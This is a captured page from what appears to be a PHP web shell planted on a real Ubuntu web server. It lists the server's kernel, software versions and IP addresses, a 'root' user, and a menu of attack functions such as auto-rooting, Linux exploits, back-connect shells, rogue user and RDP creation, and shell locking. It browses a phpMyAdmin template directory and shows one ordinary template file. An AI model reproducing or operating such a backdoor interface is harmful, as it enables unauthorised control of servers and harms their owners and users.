Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
templates /
privileges /
[ HOME SHELL ]
Name
Size
Permission
Action
add_privileges_database.phtml
702
B
-rw-r--r--
add_privileges_routine.phtml
631
B
-rw-r--r--
add_privileges_table.phtml
611
B
-rw-r--r--
edit_routine_privileges.phtml
1.27
KB
-rw-r--r--
privileges_summary.phtml
2.89
KB
-rw-r--r--
privileges_summary_row.phtml
486
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : add_privileges_database.phtml
<?php use PMA\libraries\Util; ?> <label for="text_dbname"><?= __('Add privileges on the following database(s):'); ?></label> <?php if (! empty($databases)) : ?> <select name="pred_dbname[]" multiple="multiple"> <?php foreach ($databases as $database) : ?> <?php $escapedDatabase = Util::escapeMysqlWildcards($database); ?> <option value="<?= htmlspecialchars($escapedDatabase); ?>"> <?= htmlspecialchars($database); ?> </option> <?php endforeach; ?> </select> <?php endif; ?> <input type="text" id="text_dbname" name="dbname" /> <?= Util::showHint(__('Wildcards % and _ should be escaped with a \ to use them literally.'))?>
Close